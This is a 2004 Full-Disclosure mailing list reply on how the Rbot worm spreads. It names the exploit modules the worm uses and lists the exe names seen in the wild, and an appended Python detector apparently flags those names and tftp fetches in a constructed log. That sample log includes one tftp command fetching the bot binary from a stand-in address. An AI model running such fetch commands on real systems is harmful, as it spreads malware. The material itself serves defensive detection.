Re: [Full-Disclosure] Microsoft Update Loader msrtwd.exe

From: Joe Stewart (jstewart_at_lurhq.com)
Date: 09/02/04

    To: full-disclosure@lists.netsys.com
    Date: Thu, 2 Sep 2004 10:49:55 -0400
    On Thu, 2 Sep 2004 10:16:30 -0400, S.A. Birl wrote:
    >Does anyone know how it infects?

    Primarily via the LSASS exploit over port 445, but variants have been
    seen with the following additional exploits/password brute-force
    spreading modules:

    WebDav
    Lsass135
    Lsass1025
    NetBios
    NTPass
    Dcom135
    Dcom445
    Dcom1025
    MSSQL
    Beagle1
    Beagle2
    MyDoom
    Optix
    UPNP
    NetDevil
    DameWare
    Kuang2
    Sub7

    After the exploit, the bot is copied to the victim using the Windows
    tftp client.

    > http://virusscan.jotti.dhs.org/ lists msrtwd.exe as backdoor.sdbot.gen

    Yes, some AV companies identify Rbot as SDbot, even though the two look
    almost nothing alike. It could be that Rbot was derived from SDbot, but
    it has grown substantially, and is almost on par with Agobot in terms
    of functionality.

    Because there are so many variants, each with a different exe name, it's
    sometimes hard to keep track of them. Just so it can be indexed for
    future reference, here is a list of Rbot exe names we've seen during
    exploit captures, and dates we've seen them spreading over the last 3
    months:

    Dates Seen              Exe Name
    ---------------------------------
    2004/06/06 - 2004/06/27 lsrv.exe
    2004/06/06 - 2004/08/28 wuapdate16.exe
    2004/06/07 - 2004/06/15 sndcfg16.exe
    2004/06/07 - 2004/08/30 wuamgrd.exe
    2004/06/08 - 2004/06/27 lsac.exe
    2004/06/10 - 2004/06/10 winupdos.exe
    2004/06/10 - 2004/06/26 dosprmwin.exe
    2004/06/11 - 2004/06/11 systemse.exe
    2004/06/11 - 2004/08/18 scrgrd.exe
    2004/06/13 - 2004/06/13 dude.exe
    2004/06/14 - 2004/06/14 esplorer.exe
    2004/06/14 - 2004/06/14 landriver32.exe
    2004/06/14 - 2004/06/14 mpd.exe
    2004/06/14 - 2004/06/14 updatez.exe
    2004/06/14 - 2004/06/25 svssshost.exe
    2004/06/14 - 2004/08/26 jacfg2.exe
    2004/06/17 - 2004/06/26 wuammgr32.exe
    2004/06/18 - 2004/06/18 svhost.exe
    2004/06/18 - 2004/06/18 wuamgrd32.exe
    2004/06/18 - 2004/06/23 wuamagrd.exe
    2004/06/20 - 2004/06/20 wloader.exe
    2004/06/21 - 2004/08/29 pidserv.exe
    2004/06/22 - 2004/09/01 navscan32.exe
    2004/06/23 - 2004/06/23 hpsysmon.exe
    2004/06/24 - 2004/06/24 winipcfgs.exe
    2004/06/24 - 2004/06/24 wwwstream.exe
    2004/06/25 - 2004/06/25 lcsrv64.exe
    2004/06/25 - 2004/06/25 srvhost.exe
    2004/06/25 - 2004/06/25 systemnt.exe
    2004/06/25 - 2004/06/25 win64.exe
    2004/06/27 - 2004/06/27 win32apisrvr.exe
    2004/08/16 - 2004/08/24 soundblaster.exe
    2004/08/16 - 2004/08/25 msnmsg.exe
    2004/08/16 - 2004/08/27 windowsup.exe
    2004/08/16 - 2004/08/29 muamgrd.exe
    2004/08/16 - 2004/08/30 winupdater.exe
    2004/08/16 - 2004/08/31 win16update.exe
    2004/08/16 - 2004/09/01 dllmngr32.exe
    2004/08/17 - 2004/08/17 msdev.exe
    2004/08/17 - 2004/08/17 svchostc.exe
    2004/08/17 - 2004/08/31 javatm.exe
    2004/08/17 - 2004/08/31 usbsvc.exe
    2004/08/17 - 2004/09/01 msnmsgr.exe
    2004/08/18 - 2004/08/18 mnzks.exe
    2004/08/18 - 2004/08/18 notepad.exe
    2004/08/18 - 2004/08/18 tcpip.exe
    2004/08/19 - 2004/08/19 mss3rvices200x.exe
    2004/08/19 - 2004/08/19 msservices200x.exe
    2004/08/19 - 2004/09/01 iexplore.exe
    2004/08/23 - 2004/08/23 msrtwd.exe
    2004/08/24 - 2004/08/24 csass.exe
    2004/08/24 - 2004/08/24 winxp32.exe
    2004/08/24 - 2004/08/26 nmon.exe
    2004/08/24 - 2004/08/27 winupdate.exe
    2004/08/24 - 2004/09/01 msnplus.exe
    2004/08/25 - 2004/08/25 lsas.exe
    2004/08/25 - 2004/08/27 dwervdl32.exe
    2004/08/26 - 2004/08/26 jutsu.exe
    2004/08/26 - 2004/08/26 usb.exe
    2004/08/26 - 2004/08/26 win43.exe
    2004/08/27 - 2004/08/27 java.exe
    2004/08/27 - 2004/08/27 svchost32.exe
    2004/08/27 - 2004/08/29 iexplorer.exe
    2004/08/27 - 2004/08/30 ati2vid.exe
    2004/08/27 - 2004/08/30 svchosts.exe
    2004/08/29 - 2004/08/29 server.exe
    2004/08/29 - 2004/08/30 nortoanavap.exe
    2004/08/29 - 2004/09/02 syswin32.exe
    2004/08/30 - 2004/09/02 rsvc32.exe
    2004/08/30 - 2004/09/02 vsmons.exe
    2004/08/31 - 2004/08/31 winsrv.exe
    2004/09/02 - 2004/09/02 sslwina.exe
    2004/09/02 - 2004/09/02 winxpini.exe

    -Joe

    -- 
    Joe Stewart, GCIH 
    Senior Security Researcher
    LURHQ http://www.lurhq.com/
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
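The post above gives defenders two things to look for: the exe names Rbot has been seen using, many of them one or two characters away from a real Windows binary, and the tftp fetch that copies the bot onto a freshly exploited host. The script below is an added example, not code from the post or from LURHQ: it runs a subset of the listed names, a near-miss check against an assumed set of legitimate system binaries, and a tftp GET pattern over constructed process-creation log lines (log format, host names and the 192.0.2.44 address are all made up).

```python
# Scan constructed process-creation log lines for listed Rbot image names,
# near-miss lookalikes of Windows system binaries, and the tftp GET step.
import re
from difflib import SequenceMatcher

# Subset of the exe names listed in the post above.
RBOT_NAMES = {"msrtwd.exe", "wuamgrd.exe", "csass.exe", "lsas.exe", "iexplorer.exe",
              "svchosts.exe", "navscan32.exe", "notepad.exe", "iexplore.exe",
              "winupdate.exe", "dllmngr32.exe", "lsrv.exe"}
# Assumed reference set of legitimate Windows binaries that the bot names imitate.
LEGIT = {"svchost.exe", "lsass.exe", "csrss.exe", "iexplore.exe", "notepad.exe",
         "services.exe", "explorer.exe", "winlogon.exe", "wuauclt.exe"}
# "tftp -i <host> GET <file>": the copy step the post describes.
TFTP_RE = re.compile(r'\btftp(?:\.exe)?\s+(?:-i\s+)?([^\s"]+)\s+get\s+([^\s"]+)', re.I)
IMAGE_RE = re.compile(r"image=(\S+)")

def classify(image):
    """Return (verdict, detail) for a bare image file name."""
    name = image.lower()
    if name in LEGIT:
        # Exact collisions (notepad.exe and iexplore.exe are on the list too)
        # can only be resolved from the on-disk path and hash, not the name.
        return ("verify", name) if name in RBOT_NAMES else ("clean", "")
    if name in RBOT_NAMES:
        return ("known_rbot", name)
    best = max(LEGIT, key=lambda legit: SequenceMatcher(None, name, legit).ratio())
    ratio = SequenceMatcher(None, name, best).ratio()
    if ratio >= 0.85:  # a character or two away from a real system binary
        return ("lookalike", f"{name} ~ {best} ({ratio:.2f})")
    return ("clean", "")

def scan(log_text):
    """Return [(line_no, verdict, detail)] for every suspicious entry."""
    hits = []
    for no, line in enumerate(log_text.splitlines(), 1):
        if m := TFTP_RE.search(line):
            hits.append((no, "tftp_get", f"{m.group(1)} -> {m.group(2)}"))
        if img := IMAGE_RE.search(line):
            base = img.group(1).replace("\\", "/").rsplit("/", 1)[-1]
            verdict, detail = classify(base)
            if verdict != "clean":
                hits.append((no, verdict, detail))
    return hits

# Constructed sample log; the peer address is from the documentation range.
SAMPLE_LOG = """\
2004-08-23 11:02:05 host=ws17 event=process_create image=C:\\WINDOWS\\system32\\tftp.exe cmdline="tftp -i 192.0.2.44 GET msrtwd.exe"
2004-08-23 11:02:17 host=ws17 event=process_create image=C:\\WINDOWS\\system32\\msrtwd.exe cmdline="msrtwd.exe"
2004-08-23 11:03:01 host=ws17 event=process_create image=C:\\WINDOWS\\explorer.exe cmdline="explorer.exe"
2004-08-23 11:04:40 host=ws22 event=process_create image=C:\\WINDOWS\\svhost.exe cmdline="svhost.exe"
"""
```

Running `scan(SAMPLE_LOG)` flags the tftp fetch on line 1, the listed name on line 2 and svhost.exe on line 4 as a lookalike of svchost.exe, while explorer.exe passes.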
    
